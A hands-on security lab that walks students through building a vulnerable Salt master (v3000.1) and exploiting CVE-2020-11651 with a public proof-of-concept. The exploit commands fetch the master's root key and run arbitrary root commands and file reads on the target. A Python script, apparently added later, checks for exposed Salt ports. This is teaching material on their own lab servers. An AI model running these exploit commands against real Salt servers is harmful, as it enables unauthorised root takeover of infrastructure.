W 401: Command Injection on Salt (15 pts extra)

What You Need

Purpose

To practice exploiting Salt, a popular server administration utility.

Create a Target Server

Create a new Debian 9 server on the Google Cloud, with the default settings, including a 10 GB disk.

Installing Salt

In an SSH session on your target server, execute these commands, one at a time, watching to see if any of them return errors:
sudo apt update
sudo apt install git python-dev python-setuptools python-pip -y

sudo python -m pip install pyyaml
sudo python -m pip install tornado
sudo python -m pip install jinja2
sudo python -m pip install msgpack
sudo python -m pip install zmq

git clone https://github.com/saltstack/salt
cd salt
git tag
You see a list of available versions, as shown below.

Execute these commands, one at a time, watching to see if any of them return errors:

git checkout v3000.1
sudo python setup.py install --force
It takes a few minutes to compile Salt. It should complete without errors.

Launching Salt

On your target server, execute these commands:
sudo salt-master -d
sudo ss -pant
You should see "salt-master" listening on ports 4505 and 4506, as shown below.
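As an added check that is not part of the original lab, the script below parses the output of the ss command (a constructed sample is embedded, not real output) and reports which salt-master sockets on 4505 and 4506 are bound to all interfaces, which is the exposure the rest of this lab relies on; the function and variable names are my own.

```python
import re
# Constructed sample of `sudo ss -pant` output from a host running salt-master
# (not real output from the lab). The two LISTEN sockets bound to 0.0.0.0
# are reachable from any network the host sits on.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
LISTEN  0       128     127.0.0.1:22        0.0.0.0:*          users:(("sshd",pid=410,fd=3))
LISTEN  0       1000    0.0.0.0:4505        0.0.0.0:*          users:(("salt-master",pid=1234,fd=14))
LISTEN  0       1000    0.0.0.0:4506        0.0.0.0:*          users:(("salt-master",pid=1235,fd=20))
ESTAB   0       0       10.128.0.12:22      10.128.0.5:51622   users:(("sshd",pid=2203,fd=4))
"""

# Salt master ports: 4505 is the ZeroMQ publish server, 4506 the request server.
SALT_PORTS = {4505: "publish server", 4506: "request server"}
WILDCARD_ADDRS = {"0.0.0.0", "*", "[::]"}

# One `ss -pant` row: state, queues, local addr:port, peer addr:port, process.
SS_LINE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<laddr>\S+):(?P<lport>\d+)\s+\S+:\S+\s+"
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)

def find_salt_listeners(ss_output):
    """One dict per salt-master LISTEN socket on 4505/4506; 'exposed' marks wildcard binds."""
    findings = []
    for line in ss_output.splitlines():
        m = SS_LINE.match(line)
        if not m or m.group("state") != "LISTEN":
            continue
        port = int(m.group("lport"))
        if m.group("proc") != "salt-master" or port not in SALT_PORTS:
            continue
        findings.append({
            "port": port,
            "role": SALT_PORTS[port],
            "bind": m.group("laddr"),
            "pid": int(m.group("pid")),
            "exposed": m.group("laddr") in WILDCARD_ADDRS,
        })
    return findings

def exposed_ports(ss_output):
    """Sorted list of Salt master ports bound to all interfaces."""
    return sorted(f["port"] for f in find_salt_listeners(ss_output) if f["exposed"])

if __name__ == "__main__":
    for f in find_salt_listeners(SAMPLE_SS_OUTPUT):
        where = "ALL interfaces" if f["exposed"] else f["bind"]
        print(f"salt-master pid {f['pid']} port {f['port']} ({f['role']}) bound to {where}")
```

On a real host, pipe the live output in (for example, `sudo ss -pant | python3 check.py` with a small read from stdin) and treat any exposed port as a reason to restrict the master with a firewall rule or the interface setting before exposing it to a network.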

Finding the Target IP Address

On your target server, execute this command:
ip a
Find your target server's IP address, as shown below.

Preparing the Attack Server

Create another Debian 9 server on the Google Cloud, with the default settings, including a 10 GB disk.

Installing a PoC Exploit

In an SSH session on your attack server, execute these commands, one at a time, watching to see if any of them return errors:
sudo apt update
sudo apt install git python3-pip -y
pip3 install salt

git clone https://github.com/jasperla/CVE-2020-11651-poc.git
cd CVE-2020-11651-poc/

Exploiting the Target Server

On your attack server, execute this command, adjusting the IP address to match your target server's:
python3 exploit.py --master 10.128.0.12
The exploit should work, returning a long root key, as shown below.

Flag W 401.1: salt-key (15 pts)

On your attack server, execute these commands, adjusting the IP address to match your target server's:
python3 exploit.py --master 10.128.0.12 --exec "salt-key > /foo"

python3 exploit.py --master 10.128.0.12 -r /foo
You see a list of key types. The flag is covered by a green rectangle in the image below.

References

PoC exploit for CVE-2020-11651 and CVE-2020-11652
https://github.com/jasperla/CVE-2020-11651-poc

An Introduction to SaltStack Terminology and Concepts
https://www.digitalocean.com/community/tutorials/an-introduction-to-saltstack-terminology-and-concepts

Posted 5-6-2020
Updated to remove steps to fix exploit 8-1-2020
Flag 401.2 removed 3-22-2021